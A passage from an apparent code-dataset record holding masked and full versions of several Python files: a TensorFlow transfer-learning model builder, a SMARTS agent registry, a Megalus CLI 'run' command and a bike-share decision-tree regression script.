len(model.layers):\n model.trainable = True\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-3": "<mask token>\n_data_augmentation = tf.keras.Sequential([tf.keras.layers.experimental.\n preprocessing.RandomFlip('horizontal'), tf.keras.layers.experimental.\n preprocessing.RandomRotation(0.2)])\n\n\ndef _freeze_model(model: tf.keras.Model, freeze: Union[bool, int, float]=False\n ):\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n elif freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n if freeze_len != len(model.layers):\n model.trainable = True\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-4": "import tensorflow as tf\nfrom typing import Optional, Tuple, Union, Callable\n_data_augmentation = tf.keras.Sequential([tf.keras.layers.experimental.\n preprocessing.RandomFlip('horizontal'), tf.keras.layers.experimental.\n preprocessing.RandomRotation(0.2)])\n\n\ndef _freeze_model(model: tf.keras.Model, freeze: Union[bool, int, float]=False\n ):\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n elif freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n if freeze_len != len(model.layers):\n model.trainable = True\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-5": "import tensorflow as tf\nfrom typing import Optional, Tuple, Union, Callable\n\n_data_augmentation = tf.keras.Sequential(\n [\n tf.keras.layers.experimental.preprocessing.RandomFlip(\"horizontal\"),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n ]\n)\n\n\ndef _freeze_model(\n model: tf.keras.Model,\n freeze: Union[bool, int, float] = False,\n):\n # Obs:\n # When you set layer.trainable = False, the BatchNormalization layer will\n # run in inference mode, and will not update its mean and variance statistics\n # https://www.tensorflow.org/tutorials/images/transfer_learning#important_note_about_batchnormalization_layers\n\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n else: # isinstance(freeze, bool):\n if freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n\n if freeze_len != len(model.layers):\n model.trainable = True\n\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(\n base_model: tf.keras.Model,\n img_shape: Tuple[Optional[int], Optional[int], Optional[int]],\n freeze: Union[bool, int, float] = False,\n preprocess_input: Optional[Callable] = None,\n use_data_augmentation: bool = True,\n):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation=\"sigmoid\")(x)\n\n model = tf.keras.Model(inputs, outputs)\n\n _freeze_model(base_model, freeze)\n\n base_learning_rate = 0.0001\n model.compile(\n optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate),\n loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=[\"accuracy\"],\n )\n\n return model\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from smarts.core.utils.class_factory import ClassRegister agent_registry = ClassRegister() def register(locator: str, entry_point, **kwargs): """Register an AgentSpec with the zoo. In order to load a registered AgentSpec it needs to be reachable from a directory contained in the PYTHONPATH. Args: locator: A string in the format of 'locator-name' entry_point: A callable that returns an AgentSpec or an AgentSpec object For example: .. code-block:: python register( locator="motion-planner-agent-v0", entry_point=lambda **kwargs: AgentSpec( interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose), agent_builder=MotionPlannerAgent, ), ) """ agent_registry.register(name=locator, entry_point=entry_point, **kwargs) def make(locator: str, **kwargs): """Create an AgentSpec from the given locator. In order to load a registered AgentSpec it needs to be reachable from a directory contained in the PYTHONPATH. Args: locator: A string in the format of 'path.to.file:locator-name' where the path is in the form `{PYTHONPATH}[n]/path/to/file.py` kwargs: Additional arguments to be passed to the constructed class. Returns: AgentSpec: The agent specifications needed to instantiate and configure an agent. """ from smarts.zoo.agent_spec import AgentSpec agent_spec = agent_registry.make(locator, **kwargs) assert isinstance( agent_spec, AgentSpec ), f"Expected make to produce an instance of AgentSpec, got: {agent_spec}" return agent_spec def make_agent(locator: str, **kwargs): """Create an Agent from the given agent spec locator. In order to load a registered AgentSpec it needs to be reachable from a directory contained in the PYTHONPATH. Args: locator: A string in the format of 'path.to.file:locator-name' where the path is in the form `{PYTHONPATH}[n]/path/to/file.py` kwargs: Additional arguments to be passed to the constructed class. Returns: Tuple[Agent, AgentInterface]: The agent and its interface. """ agent_spec = make(locator, **kwargs) return agent_spec.build_agent(), agent_spec.interface
normal
{ "blob_id": "b77c40c89c88b49c851e9a14c67cf0799d6de847", "index": 9235, "step-1": "<mask token>\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n agent_spec = make(locator, **kwargs)\n return agent_spec.build_agent(), agent_spec.interface\n", "step-3": "<mask token>\nagent_registry = ClassRegister()\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n agent_spec = make(locator, **kwargs)\n return agent_spec.build_agent(), agent_spec.interface\n", "step-4": "from smarts.core.utils.class_factory import ClassRegister\nagent_registry = ClassRegister()\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n agent_spec = make(locator, **kwargs)\n return agent_spec.build_agent(), agent_spec.interface\n", "step-5": "# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\nfrom smarts.core.utils.class_factory import ClassRegister\n\nagent_registry = ClassRegister()\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n\n from smarts.zoo.agent_spec import AgentSpec\n\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(\n agent_spec, AgentSpec\n ), f\"Expected make to produce an instance of AgentSpec, got: {agent_spec}\"\n\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n\n agent_spec = make(locator, **kwargs)\n\n return agent_spec.build_agent(), agent_spec.interface\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
"""Command 'run' module.""" import click from loguru import logger from megalus.main import Megalus @click.command() @click.argument("command", nargs=1, required=True) @click.pass_obj def run(meg: Megalus, command: str) -> None: """Run selected script. :param meg: Megalus instance :param command: command/script to execute :return: None """ line_to_run = meg.config_data["defaults"].get("scripts", {}).get(command, None) if not line_to_run: logger.warning('Command "{}" not found in configuration file.'.format(command)) else: meg.run_command(line_to_run)
normal
{ "blob_id": "23a4ca8eec50e6ab72be3f1b1077c61f676b3cce", "index": 5777, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\[email protected]()\[email protected]('command', nargs=1, required=True)\[email protected]_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n", "step-3": "<mask token>\nimport click\nfrom loguru import logger\nfrom megalus.main import Megalus\n\n\[email protected]()\[email protected]('command', nargs=1, required=True)\[email protected]_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n", "step-4": "\"\"\"Command 'run' module.\"\"\"\n\nimport click\nfrom loguru import logger\n\nfrom megalus.main import Megalus\n\n\[email protected]()\[email protected](\"command\", nargs=1, required=True)\[email protected]_obj\ndef run(meg: Megalus, command: str) -> None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data[\"defaults\"].get(\"scripts\", {}).get(command, None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.format(command))\n else:\n meg.run_command(line_to_run)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/env python3 import pandas from matplotlib import pyplot as plt from sklearn.tree import DecisionTreeRegressor from sklearn.ensemble import AdaBoostRegressor import numpy as np from sklearn.metrics import mean_absolute_error, mean_squared_error from math import sqrt def main(): df = pandas.read_csv("2016Q1") df = df.append(pandas.read_csv("2016Q2")) df = df.append(pandas.read_csv("2016Q3")) df = df.append(pandas.read_csv("2016Q4")) test = pandas.read_csv("2017Q1") test = test.append(pandas.read_csv("2017Q2")) test = test.append(pandas.read_csv("2017Q3")) test = test.append(pandas.read_csv("2017Q4")) #make_scatter(df) train_predict_1d(df, test) #train_predict_2d(df, test) return def make_scatter(df): plt.figure(figsize=(8,6)) plt.plot(df['Start station number'], df['Counts'], 'o') plt.xlabel('Station') plt.ylabel('Counts') plt.show() return def train_predict_1d(df, test): regressor = DecisionTreeRegressor(max_depth=2) regressor.fit(np.array([df['Start station number']]).T, df['Counts']) xx = np.array([test['Start station number']]).T plt.figure(figsize=(8,6)) plt.plot(df['Start station number'], df['Counts'], 'o', label='observation') plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=.7, label='prediction') plt.xlabel('Station') plt.ylabel('Counts') plt.legend() #plt.show() print("RMSE") print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx)))) return def train_predict_2d(df, test): #regressor = AdaBoostRegressor(DecisionTreeRegressor(max_depth=10), n_estimators=50, loss="square") regressor = DecisionTreeRegressor() regressor.fit(df[['Start station number', 'Quarter']], df['Counts']) nx = 30 ny = 30 x_station = np.linspace(30800,32300, nx) y_day = np.linspace(0, 3, ny) xx, yy = np.meshgrid(x_station, y_day) z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T) zz = np.reshape(z_counts, (nx, ny)) fig = plt.figure(figsize=(8, 8)) plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd) plt.colorbar(label='bikes predicted') #plt.scatter(test['Start station number'], test['Counts'], s=test['Counts']/25.0, c='g') plt.xlim(np.min(x_station), np.max(x_station)) plt.ylim(np.min(y_day), np.max(y_day)) plt.xlabel('Start station number') plt.ylabel('Quarter') #plt.show() #fig.savefig("2d_prediction_quarter") print("Mean Absolute Error") print(mean_absolute_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']]))) print("RMSE") print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']])))) return if __name__ == "__main__": main()
normal
{ "blob_id": "e35dbcdef8779ffabc34b5e5c543e35b29523971", "index": 7989, "step-1": "<mask token>\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n df = pandas.read_csv('2016Q1')\n df = df.append(pandas.read_csv('2016Q2'))\n df = df.append(pandas.read_csv('2016Q3'))\n df = df.append(pandas.read_csv('2016Q4'))\n test = pandas.read_csv('2017Q1')\n test = test.append(pandas.read_csv('2017Q2'))\n test = test.append(pandas.read_csv('2017Q3'))\n test = test.append(pandas.read_csv('2017Q4'))\n train_predict_1d(df, test)\n return\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main():\n df = pandas.read_csv('2016Q1')\n df = df.append(pandas.read_csv('2016Q2'))\n df = df.append(pandas.read_csv('2016Q3'))\n df = df.append(pandas.read_csv('2016Q4'))\n test = pandas.read_csv('2017Q1')\n test = test.append(pandas.read_csv('2017Q2'))\n test = test.append(pandas.read_csv('2017Q3'))\n test = test.append(pandas.read_csv('2017Q4'))\n train_predict_1d(df, test)\n return\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "import pandas\nfrom matplotlib import pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import AdaBoostRegressor\nimport numpy as np\nfrom sklearn.metrics import mean_absolute_error, 